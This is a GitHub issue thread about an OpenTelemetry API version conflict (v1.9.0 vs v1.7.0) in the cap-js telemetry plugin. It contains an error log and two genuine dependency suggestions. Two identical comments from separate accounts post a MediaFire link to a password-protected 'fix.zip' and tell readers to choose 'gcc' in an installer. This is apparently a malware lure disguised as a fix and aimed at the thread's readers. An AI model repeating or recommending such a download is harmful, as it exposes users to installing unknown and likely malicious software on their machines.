### ISSUE TITLE
OpenTelemetry/API Error: Registration of version v1.9.0 for propagation does not match previously registered API v1.7.0

### ISSUE THREAD

**Issue by sandeepharidasan** [cap-js/telemetry#220]
Hi,
With the latest version of the telemetry plugin, we are getting this error:
```
"level": "error",
"logger": "telemetry",
"timestamp": "2024-08-20T10:33:05.022Z",
"msg": "Error: @opentelemetry/api: Registration of version v1.9.0 for propagation does not match previously registered API v1.7.0",
"stack_trace": [
"at registerGlobal (/usr/src/srv/node_modules/@opentelemetry/api/build/src/internal/global-utils.js:38:21)",
"at PropagationAPI.setGlobalPropagator (/usr/src/srv/node_modules/@opentelemetry/api/build/src/api/propagation.js:52:50)",
"at NodeTracerProvider.register (/usr/src/srv/node_modules/@opentelemetry/sdk-trace-base/build/src/BasicTracerProvider.js:100:31)",
"at NodeTracerProvider.register (/usr/src/srv/node_modules/@opentelemetry/sdk-trace-node/build/src/NodeTracerProvider.js:43:15)",
"at module.exports (/usr/src/srv/node_modules/@cap-js/telemetry/lib/tracing/index.js:123:20)",
"at module.exports (/usr/src/srv/node_modules/@cap-js/telemetry/lib/index.js:36:26)",
"at Object.<anonymous> (/usr/src/srv/node_modules/@cap-js/telemetry/cds-plugin.js:12:31)",
"at Module._compile (node:internal/modules/cjs/loader:1364:14)",
"at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)",
"at Module.load (node:internal/modules/cjs/loader:1203:32)"
]
```

I believe this might be caused by the update of @cap-js/telemetry dependency from v0.2.3 to v1.0.1
CAP-TELEMETRY-PR: https://github.com/cap-js/telemetry/pull/208

We were also able to locally see the error after running `npm run start`
![image](https://github.com/user-attachments/assets/8b0c27e9-e314-4034-aefb-6e501741dae7)

`npm list @opentelemetry/api `provides the below output with the version conflict
![image](https://github.com/user-attachments/assets/76eb1b02-bdbf-4580-ace9-4ba12a07d46f)

Could you please check and advise how this can be rectified.

Thanks and regards,
Sandeep

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yevgentrukhin** [comment]
don't have this problem, can u add in package.json dependency to 1.9.0 opentelemetry api.

**Comment by sjvans** [comment]
looks like you'll need to upgrade to @opentelemetry/exporter-prometheus@0.53.0
